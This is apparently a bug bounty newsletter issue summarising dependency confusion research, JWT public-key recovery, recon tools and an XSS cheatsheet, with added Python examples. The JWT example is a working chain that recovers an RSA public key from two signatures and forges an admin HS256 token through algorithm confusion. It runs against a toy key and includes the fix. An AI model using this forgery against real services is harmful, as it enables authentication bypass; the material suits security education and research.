Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from February 1st to February 8th.
Our favorite 5 hacking items
1. Writeup of the week
Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies
Wow, this is such a great writeup! If you don’t have time to check out anything else, just read this for a dose of mindblowing Web security research. Alex Birsan (@alxbrsn) explains an attack he calls “dependency confusion” that affected big companies.
In a nutshell: if a company installs an internal (private) Python, Ruby or Node package by name, and an attacker publishes a package with the same name and a higher version number on the public registry (PyPI, RubyGems or npm), the package manager picks the public package because it has the highest version. The attacker’s install hooks then run on the target’s internal build servers and developers’ machines. That’s how Alex pwned PayPal, Shopify, Apple, Microsoft and many more.
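To make the resolution rule concrete, here is a small added model (not code from the writeup or from any package manager) of how a resolver that pools a private and a public index ends up choosing the attacker’s package, next to two of the mitigations the research points at: routing internal names only to the private index, and claiming unregistered internal names publicly. The two indexes, the package names and the `acme-` internal prefix are constructed sample data.

```python
"""Toy model of package resolution across a private and a public index,
showing why a same-named public package with a higher version wins and two
ways to stop it. Both indexes are constructed sample data, not live registries."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Candidate:
    name: str
    version: tuple   # e.g. (1, 4, 2); tuples compare component-wise
    index: str       # "private" or "public"


def parse_version(s: str) -> tuple:
    return tuple(int(part) for part in s.split("."))


# Constructed indexes. acme-internal-utils exists privately and has been
# squatted on the public index with a deliberately huge version number;
# acme-billing is internal-only and still unclaimed publicly.
PRIVATE_INDEX = {
    "acme-internal-utils": ["1.4.2", "1.4.1"],
    "acme-billing": ["0.3.0"],
}
PUBLIC_INDEX = {
    "acme-internal-utils": ["99.0.0"],   # attacker's upload
    "requests": ["2.25.1", "2.24.0"],
}
INTERNAL_PREFIX = "acme-"   # assumed naming convention for internal packages


def candidates(name: str, indexes) -> list:
    return [Candidate(name, parse_version(v), label)
            for label, idx in indexes for v in idx.get(name, [])]


def pick_highest(cands: list) -> Candidate:
    if not cands:
        raise LookupError("no distribution found")
    return max(cands, key=lambda c: c.version)


def resolve_confused(name: str) -> Candidate:
    """pip with --extra-index-url (and comparable npm/gem setups): candidates
    from both indexes are pooled and the highest version wins, wherever it
    came from."""
    return pick_highest(candidates(name, [("private", PRIVATE_INDEX),
                                          ("public", PUBLIC_INDEX)]))


def resolve_pinned(name: str) -> Candidate:
    """Mitigation 1: route the internal namespace to the private index only and
    everything else to the public one, so the two candidate sets never mix."""
    if name.startswith(INTERNAL_PREFIX):
        return pick_highest(candidates(name, [("private", PRIVATE_INDEX)]))
    return pick_highest(candidates(name, [("public", PUBLIC_INDEX)]))


def unclaimed_internal_names() -> list:
    """Mitigation 2: internal names nobody has registered publicly yet; claim
    them with a placeholder release before an attacker does."""
    return sorted(n for n in PRIVATE_INDEX
                  if n.startswith(INTERNAL_PREFIX) and n not in PUBLIC_INDEX)
```

`resolve_confused("acme-internal-utils")` returns the public 99.0.0 candidate, while `resolve_pinned` returns the private 1.4.2 one; `unclaimed_internal_names()` lists `acme-billing`, which resolves correctly today only because nobody has squatted it yet.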
2. Article of the week
Abusing JWT Public Keys Without The Public Key & rsa_sig2n
Silent Signal researchers had to test an RSA implementation but did not have the public keys used to verify its signatures. So they worked out a technique, released as the rsa_sig2n tool, to recover the public key from just two signatures over known messages. The most interesting bit for bug hunters is that it lets you forge JWTs, as shown in their PoC exploiting CVE-2017-11424 (a key confusion vulnerability in PyJWT, where an RSA public key ends up being used as an HMAC secret).
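The whole chain, as an added example that is not Silent Signal’s code or rsa_sig2n itself: two PKCS#1 v1.5 / SHA-256 signatures over known messages give away the modulus because n divides s^e - m for each pair, so the gcd of the two differences is n times a small cofactor. The recovered key is then serialized as a PEM and used as the HMAC secret for an HS256 token, which a verifier with the CVE-2017-11424 behaviour accepts. The key is a constructed toy (two Mersenne primes, e = 17 so that s^e stays cheap in pure Python; real keys use e = 65537 and need a bignum library, as the tool does), and `confused_verify` is a model of the vulnerable verifier, not PyJWT’s code; a real target only falls to this if the exact PEM bytes it loads are what it feeds to HMAC.

```python
"""Recover an RSA public key from two PKCS#1 v1.5 / SHA-256 signatures over
known messages, then feed the recovered key into the HS256 key-confusion
forgery. Toy key constructed inline; not real material."""
import base64
import hashlib
import hmac
import json
from math import gcd

# Constructed toy key from two Mersenne primes with e = 17 (trivially factorable,
# for demonstration only). e is kept small so s**e stays cheap in pure Python;
# with the usual e = 65537, s**e is a multi-megabyte integer.
P = 2**607 - 1
Q = 2**127 - 1
N = P * Q
E = 17
D = pow(E, -1, (P - 1) * (Q - 1))   # modular inverse (Python >= 3.8)
K = (N.bit_length() + 7) // 8        # modulus size in bytes

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def emsa_pkcs1_v15(msg: bytes, k: int) -> int:
    """EMSA-PKCS1-v1_5 encoding of msg, as the integer the signer exponentiates."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    em = b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t
    return int.from_bytes(em, "big")


def rsa_sign(msg: bytes) -> int:
    return pow(emsa_pkcs1_v15(msg, K), D, N)


def recover_modulus(pairs, e: int = E, k: int = K) -> int:
    """s**e == m (mod n) for each (message m, signature s), so n divides every
    s**e - m; the gcd of two such values is n times a small cofactor, which
    trial division strips (a real RSA modulus has no small factors)."""
    n = 0
    for msg, sig in pairs:
        n = gcd(n, pow(sig, e) - emsa_pkcs1_v15(msg, k))
    for f in range(2, 10000):
        while n % f == 0:
            n //= f
    return n


def _der(tag: int, body: bytes) -> bytes:
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + body


def _der_int(x: int) -> bytes:
    # +8 rather than +7 bits forces a leading 0x00 when the top bit is set
    return _der(0x02, x.to_bytes((x.bit_length() + 8) // 8, "big"))


def spki_pem(n: int, e: int) -> str:
    """SubjectPublicKeyInfo PEM, the format `openssl rsa -pubout` emits."""
    rsa_pub = _der(0x30, _der_int(n) + _der_int(e))
    alg = _der(0x30, bytes.fromhex("06092a864886f70d010101") + b"\x05\x00")
    spki = _der(0x30, alg + _der(0x03, b"\x00" + rsa_pub))
    b64 = base64.b64encode(spki).decode()
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return f"-----BEGIN PUBLIC KEY-----\n{body}\n-----END PUBLIC KEY-----\n"


def _b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _b64url_dec(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def forge_hs256(payload: dict, secret: bytes) -> str:
    """Token an attacker builds once the RSA public key is in hand."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [_b64url(json.dumps(x, separators=(",", ":")).encode()) for x in (header, payload)]
    signing_input = ".".join(parts)
    tag = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(tag)


def confused_verify(token: str, pem: str) -> dict:
    """Model of the vulnerable verifier: honours alg from the header and hands
    the PEM text to HMAC when it says HS256 (the CVE-2017-11424 pattern). A safe
    verifier fixes the expected algorithm and refuses HS* with an RSA key."""
    h, p, s = token.split(".")
    if json.loads(_b64url_dec(h))["alg"] != "HS256":
        raise ValueError("RS256 path not modelled in this toy")
    expected = hmac.new(pem.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_dec(s)):
        raise ValueError("bad signature")
    return json.loads(_b64url_dec(p))


def demo() -> dict:
    """Full chain on two constructed messages: recover n, build the PEM, forge."""
    m1, m2 = b"GET /api/orders/1", b"GET /api/orders/2"
    n = recover_modulus([(m1, rsa_sign(m1)), (m2, rsa_sign(m2))])
    pem = spki_pem(n, E)
    return confused_verify(forge_hs256({"sub": "admin", "admin": True}, pem.encode()), pem)
```

`demo()` returns the forged claims, which is the verifier accepting a token it never issued. The fix on the verifying side is the same as for any alg-confusion issue: pin the expected algorithm (RS256) when decoding and never let the token header choose between asymmetric and symmetric verification.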
3. Tools of the week
UDdup & dwn – a docker pwn tool manager experiment
UDdup is a handy Python tool that detects similar endpoints (e.g. /product/123?is_prod=false and /product/222?is_debug=true) in a list and removes them. This is helpful for removing redundant URLs from the output of recon tools like gau or waybackurls.
dwn is a “docker-compose for hackers”. @leonjza created it to solve some limitations of docker-compose. It allows you to run dockerized tools from any folder with the ability to make on-the-fly configuration changes, dynamic port maps and volume mounts (all of which aren’t possible with docker-compose).
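For the UDdup idea above, here is an added example (my own reimplementation of the heuristic, not UDdup’s code, whose rules differ in detail) that collapses URLs sharing an endpoint shape while keeping the union of parameter names seen for each, so nothing a tester wants to fuzz is lost. The sample URLs are constructed.

```python
"""Collapse URLs that differ only in numeric path segments or parameter values,
the redundancy UDdup strips from gau / waybackurls output, while keeping the
union of parameter names per endpoint. Sample URLs are constructed."""
import re
from urllib.parse import parse_qsl, urlsplit


def url_signature(url: str) -> tuple:
    """Endpoint shape: host plus path with digit runs masked, so /product/123
    and /product/222 (with or without a trailing slash) share one signature."""
    u = urlsplit(url)
    path = re.sub(r"\d+", "{n}", u.path.rstrip("/") or "/")
    return (u.netloc.lower(), path)


def dedup_urls(urls) -> list:
    """Return (first URL seen, sorted parameter names seen) per endpoint shape."""
    groups, order = {}, []
    for url in urls:
        sig = url_signature(url)
        params = {k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)}
        if sig not in groups:
            groups[sig] = (url, set())
            order.append(sig)
        groups[sig][1].update(params)
    return [(groups[s][0], sorted(groups[s][1])) for s in order]


# Constructed recon output
SAMPLE_URLS = [
    "https://example.com/product/123?is_prod=false",
    "https://example.com/product/222?is_debug=true",
    "https://example.com/product/222/",
    "https://example.com/api/v2/users/42",
    "https://example.com/api/v2/users/43",
    "https://example.com/login?next=/",
]
```

`dedup_urls(SAMPLE_URLS)` reduces the six lines to three endpoints and reports `is_debug` and `is_prod` together on the product endpoint, which is exactly the information the two original product URLs carried between them.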
4. Videos of the week
Recon and Corporate OSINT with DNSGrep and Rapid7 Open Data
Live Recon and Google Dorking on the Department of Defense’s Vuln Disclosure Program with @thedawgyg
These videos will be very informative if you want to improve your recon. @codingo_ shares why using data sources directly (as opposed to running multiple subdomain enumeration tools) can be beneficial and how to do it, with a focus on the Rapid7 Open Data project.
In the second video, @thedawgyg does some live recon on the Department of Defense’s Vulnerability Disclosure Program and shows @NahamSec his approach and tips.
5. Resource of the week
Cheatsheet: XSS that works in 2021
This is a cool new cheatsheet full of XSS payloads, filter bypasses and tips that work in modern browsers.
Other amazing things we stumbled upon this week
Webinars & Webcasts
Medium to advanced
Responsible(ish) disclosure writeups
Bug bounty writeups
See more writeups on The list of bug bounty writeups.
Misc. pentest & bug bounty resources
Bug bounty & Pentest news
Community pick of the week
We’d love to hear from you too about your bug bounty wins, swag and joys. Tag us on social media if you want to share them with other Bug Bytes readers.